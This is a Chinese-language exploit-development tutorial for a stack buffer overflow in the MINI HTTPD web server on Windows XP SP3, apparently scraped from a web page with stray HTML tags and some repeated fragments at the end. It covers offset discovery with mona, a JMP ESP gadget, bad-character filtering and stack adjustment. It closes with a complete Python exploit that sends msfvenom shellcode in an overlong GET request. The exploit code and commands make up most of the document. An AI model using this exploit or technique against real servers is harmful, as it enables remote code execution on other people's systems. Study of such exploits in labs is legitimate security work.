MINI HTTPD 远程代码执行漏洞EXP编写教程<\/h1>

测试环境准备<\/h2>
操作系统：Windows XP Home with Service Pack 3 (x86)<\/li>
调试工具：Immunity Debugger(x86)\/mona<\/li>
Python版本：Python 2.7.1（主要使用）<\/li>
目标服务：MINI HTTPD<\/li> <\/ul>
漏洞利用开发流程<\/h2>

1. 初始POC构造<\/h3>
import<\/span> sys
<\/span><\/span>import<\/span> socket
<\/span><\/span>
<\/span><\/span># 创建缓冲区<\/span>
<\/span><\/span>buffer =<\/span> "A"<\/span> *<\/span> 1000<\/span>
<\/span><\/span>
<\/span><\/span>HOST =<\/span> '127.0.0.1'<\/span>
<\/span><\/span>PORT =<\/span> 80<\/span>
<\/span><\/span>
<\/span><\/span>req =<\/span> "GET \/"<\/span>+<\/span>buffer+<\/span>"HTTP\/1.1<\/span>\r\n\r\n<\/span>"<\/span>
<\/span><\/span>s =<\/span> socket.<\/span>socket(socket.<\/span>AF_INET, socket.<\/span>SOCK_STREAM)  
<\/span><\/span>s.<\/span>connect((HOST, PORT))  
<\/span><\/span>s.<\/span>send(req)  
<\/span><\/span>data =<\/span> s.<\/span>recv(1024<\/span>)  
<\/span><\/span>s.<\/span>close()  
<\/span><\/span>print 'Received'<\/span>, repr(data)
<\/span><\/span><\/code><\/pre>2. 偏移量计算<\/h3>
使用mona插件创建模式字符串：<\/p>
!mona config -set workingfolder c:\logs\%p
!mona pc 1000
<\/code><\/pre>
分析崩溃时的寄存器值，确定EIP覆盖点：<\/p>
!mona findmsp
<\/code><\/pre>
结果显示EIP在967字节后被覆盖，ESP指向偏移971处。<\/p>
3. 验证偏移量<\/h3>
offset_eip =<\/span> 967<\/span>
<\/span><\/span>EIP =<\/span> 'BBBB'<\/span>
<\/span><\/span>ESP =<\/span> 'CCCC'<\/span>
<\/span><\/span>ESI =<\/span> 'DDDD'<\/span>
<\/span><\/span>buffer =<\/span> 'A'<\/span> *<\/span> 225<\/span>
<\/span><\/span>buffer +=<\/span> ESI
<\/span><\/span>buffer +=<\/span> 'A'<\/span> *<\/span> (offset_eip -<\/span> len(buffer))
<\/span><\/span>buffer +=<\/span> EIP
<\/span><\/span>buffer +=<\/span> ESP
<\/span><\/span>buffer +=<\/span> 'E'<\/span> *<\/span> (1500<\/span> -<\/span> len(buffer))
<\/span><\/span><\/code><\/pre>4. 寻找JMP ESP指令<\/h3>
使用mona查找可用的JMP ESP指令：<\/p>
!mona jmp -r esp
<\/code><\/pre>
选择USER32.dll中的地址：0x7e4456f7<\/p>
5. 构造跳转指令<\/h3>
import<\/span> struct
<\/span><\/span>EIP =<\/span> struct.<\/span>pack('<I'<\/span>, 0x7e4456f7<\/span>)  # jmp esp : USER32.dll gadget<\/span>
<\/span><\/span>ESP =<\/span> '<\/span>\xcc\xcc\xcc\xcc<\/span>'<\/span>  # 断点指令<\/span>
<\/span><\/span><\/code><\/pre>6. 计算跳转距离<\/h3>
使用metasm计算向后跳转的操作码：<\/p>
jmp $-971  # 0xE930FCFFFF
<\/code><\/pre>
7. 确定shellcode位置<\/h3>
使用模式字符串确定shellcode偏移量为641字节<\/p>
8. 坏字符检测<\/h3>
排除已知坏字符：\x00\x20\x2f\x3f

使用mona生成检测数组：<\/p>
!mona bytearray -cpb "\x00\x20\x2f\x3f"
<\/code><\/pre>
通过多次测试发现额外坏字符：\x0d\x0c\x0b\x0a\x09<\/p>
9. 生成shellcode<\/h3>
使用msfvenom生成calc.exe的shellcode：<\/p>
msfvenom -p windows\/exec CMD=<\/span>calc.exe -b "\x00\x20\x2f\x3f\x0d\x0c\x0b\x0a\x09"<\/span> -f c --arch x86 --platform windows
<\/span><\/span><\/code><\/pre>10. 调整栈指针<\/h3>
为避免shellcode执行时破坏栈，添加栈指针调整指令：<\/p>
add esp,-3e8h  # "\x81\xc4\x18\xfc\xff\xff"
<\/code><\/pre>
完整EXP代码<\/h2>
import<\/span> sys
<\/span><\/span>import<\/span> socket
<\/span><\/span>import<\/span> struct
<\/span><\/span>
<\/span><\/span>offset_eip =<\/span> 967<\/span>
<\/span><\/span>offset_shellcode =<\/span> 641<\/span>
<\/span><\/span>EIP =<\/span> struct.<\/span>pack('<I'<\/span>, 0x7e4456f7<\/span>)  # jmp esp ntdll.dll<\/span>
<\/span><\/span>
<\/span><\/span># 坏字符: "\x00\x20\x2f\x3f\x0d\x0c\x0b\x0a\x09"<\/span>
<\/span><\/span>
<\/span><\/span>ESP =<\/span> '<\/span>\x81\xc4\x18\xfc\xff\xff<\/span>'<\/span>  # add esp,-3e8h<\/span>
<\/span><\/span>ESP +=<\/span> "<\/span>\xe9\x2a\xfc\xff\xff<\/span>"<\/span>    # jmp $-977<\/span>
<\/span><\/span>buffer =<\/span> 'A'<\/span> *<\/span> offset_shellcode
<\/span><\/span>
<\/span><\/span># windows\/exec CMD=calc.exe<\/span>
<\/span><\/span>shellcode =<\/span> (
<\/span><\/span>"<\/span>\xb8\x69\xfc\x2c\xd8\xdb\xc9\xd9\x74\x24\xf4\x5e\x29\xc9<\/span>"<\/span>
<\/span><\/span>"<\/span>\xb1\x31\x31\x46\x13\x83\xc6\x04\x03\x46\x66\x1e\xd9\x24<\/span>"<\/span>
<\/span><\/span>"<\/span>\x90\x5c\x22\xd5\x60\x01\xaa\x30\x51\x01\xc8\x31\xc1\xb1<\/span>"<\/span>
<\/span><\/span>"<\/span>\x9a\x14\xed\x3a\xce\x8c\x66\x4e\xc7\xa3\xcf\xe5\x31\x8d<\/span>"<\/span>
<\/span><\/span>"<\/span>\xd0\x56\x01\x8c\x52\xa5\x56\x6e\x6b\x66\xab\x6f\xac\x9b<\/span>"<\/span>
<\/span><\/span>"<\/span>\x46\x3d\x65\xd7\xf5\xd2\x02\xad\xc5\x59\x58\x23\x4e\xbd<\/span>"<\/span>
<\/span><\/span>"<\/span>\x28\x42\x7f\x10\x23\x1d\x5f\x92\xe0\x15\xd6\x8c\xe5\x10<\/span>"<\/span>
<\/span><\/span>"<\/span>\xa0\x27\xdd\xef\x33\xee\x2c\x0f\x9f\xcf\x81\xe2\xe1\x08<\/span>"<\/span>
<\/span><\/span>"<\/span>\x25\x1d\x94\x60\x56\xa0\xaf\xb6\x25\x7e\x25\x2d\x8d\xf5<\/span>"<\/span>
<\/span><\/span>"<\/span>\x9d\x89\x2c\xd9\x78\x59\x22\x96\x0f\x05\x26\x29\xc3\x3d<\/span>"<\/span>
<\/span><\/span>"<\/span>\x52\xa2\xe2\x91\xd3\xf0\xc0\x35\xb8\xa3\x69\x6f\x64\x05<\/span>"<\/span>
<\/span><\/span>"<\/span>\x95\x6f\xc7\xfa\x33\xfb\xe5\xef\x49\xa6\x63\xf1\xdc\xdc<\/span>"<\/span>
<\/span><\/span>"<\/span>\xc1\xf1\xde\xde\x75\x9a\xef\x55\x1a\xdd\xef\xbf\x5f\x11<\/span>"<\/span>
<\/span><\/span>"<\/span>\xba\xe2\xc9\xba\x63\x77\x48\xa7\x93\xad\x8e\xde\x17\x44<\/span>"<\/span>
<\/span><\/span>"<\/span>\x6e\x25\x07\x2d\x6b\x61\x8f\xdd\x01\xfa\x7a\xe2\xb6\xfb<\/span>"<\/span>
<\/span><\/span>"<\/span>\xae\x81\x59\x68\x32\x68\xfc\x08\xd1\x74<\/span>"<\/span>
<\/span><\/span>)
<\/span><\/span>
<\/span><\/span>buffer +=<\/span> shellcode
<\/span><\/span>buffer +=<\/span> 'A'<\/span> *<\/span> (offset_eip -<\/span> len(buffer))
<\/span><\/span>buffer +=<\/span> EIP
<\/span><\/span>buffer +=<\/span> ESP
<\/span><\/span>buffer +=<\/span> 'E'<\/span> *<\/span> (1500<\/span> -<\/span> len(buffer))
<\/span><\/span>
<\/span><\/span>HOST =<\/span> '127.0.0.1'<\/span>
<\/span><\/span>PORT =<\/span> 80<\/span>
<\/span><\/span>
<\/span><\/span>req =<\/span> "GET \/"<\/span>+<\/span>buffer+<\/span>"HTTP\/1.1<\/span>\r\n\r\n<\/span>"<\/span>
<\/span><\/span>s =<\/span> socket.<\/span>socket(socket.<\/span>AF_INET, socket.<\/span>SOCK_STREAM)
<\/span><\/span>s.<\/span>connect((HOST, PORT))
<\/span><\/span>s.<\/span>send(req)
<\/span><\/span>data =<\/span> s.<\/span>recv(1024<\/span>)
<\/span><\/span>s.<\/span>close()
<\/span><\/span>print 'Received'<\/span>, repr(data)
<\/span><\/span><\/code><\/pre>关键点总结<\/h2>

偏移量计算<\/strong>：使用mona生成模式字符串并分析崩溃点<\/li>
指令选择<\/strong>：选择系统DLL中稳定的JMP ESP指令<\/li>
坏字符检测<\/strong>：逐步排除所有会影响漏洞利用的字符<\/li>
栈指针调整<\/strong>：确保shellcode执行时不会破坏自身<\/li>
跳转计算<\/strong>：精确计算跳转距离以准确到达shellcode位置<\/li>
<\/ol>
通过以上步骤，可以成功利用MINI HTTPD的远程代码执行漏洞。<\/p>
MINI HTTPD 远程代码执行漏洞EXP编写教程<\/h1>

漏洞利用开发流程<\/h2>

7. 确定shellcode位置<\/h3> 使用模式字符串确定shellcode偏移量为641字节<\/p>

7. 确定shellcode位置<\/h3>
使用模式字符串确定shellcode偏移量为641字节<\/p>
